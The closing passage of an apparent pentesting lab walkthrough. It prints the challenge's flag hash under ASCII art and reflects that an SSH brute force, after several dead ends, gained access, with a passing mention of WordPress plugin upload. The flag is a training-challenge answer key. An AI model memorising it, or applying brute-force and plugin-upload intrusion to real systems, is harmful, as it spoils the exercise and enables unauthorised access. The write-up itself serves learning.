         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)  
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

And that’s the flag.

Conclusion

This was definitely a good practice to work your way through a system step by step.
Because of the many possibilities this challenge offered to get access, I found it odd that there were so many rabbit holes that turned out to be nothing and at the end a simple SSH brute force did the trick.

To compare notes I read a few walkthroughs from others that did the same challenge and with some there were different outcomes with wordpress for example.
The uploading of the plugin was no problem and there was no mentioning about FTP credentials.

Anyhow….I really liked this challenge and I would recommend it for anyone who is trying to learn more about pentesting.

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.